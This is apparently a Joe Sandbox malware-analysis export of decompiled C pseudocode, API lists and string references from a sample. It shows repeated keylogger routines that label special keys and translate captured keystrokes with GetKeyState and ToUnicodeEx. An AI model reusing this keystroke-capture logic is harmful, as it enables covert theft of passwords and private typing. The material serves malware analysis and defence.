					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85dae
0x00c85db5
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Print Screen], xrefs: 00C85DB0
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8595B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8595B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Back Tab]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c8595b
0x00c85962
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Back Tab], xrefs: 00C8595D

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85DBC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DBC(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Arrow Up]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85dbc
0x00c85dc3
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

[Arrow Up], xrefs: 00C85DBE
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85DD8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DD8(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Volume Mute]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85dd8
0x00c85ddf
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Volume Mute], xrefs: 00C85DDA
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85DCA, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DCA(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Volume Down]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85dca
0x00c85dd1
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Volume Down], xrefs: 00C85DCC
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85A38, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A38(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Accept]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85a38
0x00c85a3f
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
